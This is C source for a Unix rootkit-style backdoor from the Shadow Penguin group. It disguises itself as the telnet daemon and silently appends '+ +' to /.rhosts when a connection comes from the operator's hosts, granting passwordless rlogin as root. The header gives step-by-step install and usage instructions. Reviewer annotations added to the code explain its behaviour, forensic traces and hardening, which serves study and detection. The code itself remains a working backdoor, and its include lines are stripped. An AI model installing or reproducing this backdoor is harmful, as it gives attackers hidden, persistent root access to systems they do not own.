/*================================================================================
 Remote Backdoor for rlogin
 The Shadow Penguin Security (http://shadowpenguin.backsection.net)
 Written by UNYUN (shadowpenguin@backsection.net)

 [Install]
 1) Input your host to /*1*/
 2) To be a root
 3) mv /usr/sbin/in.telnetd /usr/sbin/sysmon (you can change "sysmon" in /*2*/)
 4) cc in.telnetd.c -o in.telnetd
 5) mv in.telnetd /usr/sbin

 [usage]
 1) Make a connection to port23 of the target host (ex. telnet targethost)
 2) rlogin target -l root
================================================================================ */

/*
 * Reviewer annotation: defensive reading of this listing.
 *
 * Behaviour, as far as the visible code shows:
 *   - The program is a wrapper installed under the telnet daemon's path.
 *     On each invocation it obtains the peer address of descriptor
 *     RQ_DAEMON, reverse-resolves it, and substring-matches the resulting
 *     hostname against roothosts[].
 *   - On a match it appends the line "+ +" to RHOSTS ("/.rhosts"). In
 *     .rhosts syntax that line trusts any user from any host; the usage
 *     text above relies on the rlogin service honouring it for root.
 *     NOTE(review): this presumes root's home directory is "/" on the
 *     intended systems - confirm per platform.
 *   - It then exec's ORIGINAL, the relocated genuine daemon, with the
 *     caller's argv, so the telnet session itself proceeds as usual.
 *
 * Host artefacts an investigator can check:
 *   - "+ +" lines in /.rhosts. The file is opened in append mode on every
 *     matching connection with no de-duplication, so the number of such
 *     lines is a lower bound on the number of triggering connections.
 *   - /usr/sbin/in.telnetd that no longer matches the vendor package
 *     (size, hash, package verification), together with a second binary
 *     holding the real daemon. The name "sysmon" is author-configurable,
 *     so match on file content rather than on the name.
 *   - In a recovered sample, the roothosts[] strings name the hosts the
 *     operator connects from; correlate them with connection logs.
 *
 * Hardening that removes the mechanism: file-integrity monitoring on
 * /usr/sbin and on root's home directory detects the install step, and
 * disabling the r-services (or configuring them to ignore .rhosts) makes
 * the appended entry ineffective.
 */

/* The seven header names below were lost when the page was extracted. */
#include
#include
#include
#include
#include
#include
#include

/*
 * Hostname patterns that trigger the .rhosts write. The list is terminated
 * by an empty string; the entries shown are the author's placeholders.
 */
static char *roothosts[]={"yoursite.ne.jp", /* 1 */
                          "fumidai.ac.jp",
                          ""};

#define ORIGINAL "/usr/sbin/sysmon" /* 2 */  /* path exec'd at the end of main */
#define RQ_DAEMON 2                          /* descriptor queried for the peer address;
                                                presumably the client socket handed over
                                                by the super-server - TODO confirm */
#define BUFFER_SIZE 512                      /* not referenced in the visible code */
#define RHOSTS "/.rhosts"                    /* file that receives the "+ +" line */

/*
 * Entry point of the wrapper: optionally appends a trust entry to RHOSTS
 * depending on the connecting host's name, then replaces itself with
 * ORIGINAL. argv is forwarded unchanged to ORIGINAL.
 */
main(int argc,char *argv[])
{
    struct sockaddr_in client;
    struct in_addr clientIn;
    struct hostent *h;
    char buf[BUFSIZ],ClientDomain[200];   /* ClientDomain is never used below */
    int len,i,flag;
    long inetip;
    FILE *fp;

    /*
     * Find out who is on the other end of RQ_DAEMON. getpeername is tried
     * first; if it fails, recvfrom with MSG_PEEK is used to read the
     * sender address without consuming the pending data.
     */
    len = sizeof(client);
    if (getpeername(RQ_DAEMON, (struct sockaddr *)&client, &len) < 0) {
        len = sizeof(client);
        if (recvfrom(RQ_DAEMON,buf,sizeof(buf),MSG_PEEK,
                     (struct sockaddr *) & client, &len) < 0) {
            /* No peer address available: exits here, ORIGINAL is not run. */
            return;
        }
    }

    /* Copy the 4-byte IPv4 address and round-trip it through dotted-quad text. */
    memcpy(&clientIn,&client.sin_addr.s_addr,4);
    inetip=inet_addr(inet_ntoa(clientIn));

    /* Reverse lookup of the peer address; h is NULL when no name comes back. */
    h=(struct hostent *)gethostbyaddr(&inetip,sizeof(struct hostent),AF_INET);
    if (h!=NULL){
        /*
         * Walk roothosts[] up to the empty-string terminator (at most 10
         * entries) and set flag when either string contains the other.
         */
        for (flag=0,i=0;i<10;i++){
            if (strlen(roothosts[i])==0) break;
            if (strstr(roothosts[i],h->h_name)!=NULL ||
                strstr(h->h_name,roothosts[i])!=NULL){
                flag=1;
                break;
            }
        }
        if (flag==1){
            /*
             * Append "+ +" to RHOSTS. A failed fopen is ignored, so the
             * wrapper stays silent when the file cannot be written.
             */
            if ((fp=fopen(RHOSTS,"a"))!=NULL){
                fprintf(fp,"+ +\n");
                fclose(fp);
            }
        }
    }

    /* Replace this process with the relocated original daemon in all cases. */
    execv(ORIGINAL,argv);
}